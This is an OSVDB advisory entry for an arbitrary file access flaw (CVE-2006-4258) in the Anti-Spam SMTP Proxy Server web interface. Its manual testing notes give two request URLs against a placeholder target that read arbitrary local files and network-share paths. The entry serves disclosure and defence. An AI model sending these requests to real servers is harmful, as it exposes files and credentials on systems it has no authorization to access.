Anti-Spam SMTP Proxy Server (ASSP) get?file Function Arbitrary File Access

2006-08-15T11:48:44
ID OSVDB:27968
Type osvdb
Reporter OSVDB
Modified 2006-08-15T11:48:44

Description

Manual Testing Notes

http://[target]:55555/get?file=c:\dir\subdir\file.ext http://[target]:55555/get?file=\server\share\dir\file.ext

References:

Vendor URL: http://www.asspsmtp.org/ Vendor URL: http://assp.sourceforge.net/ Secunia Advisory ID:21523 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0480.html FrSIRT Advisory: ADV-2006-3289 CVE-2006-4258 Bugtraq ID: 19545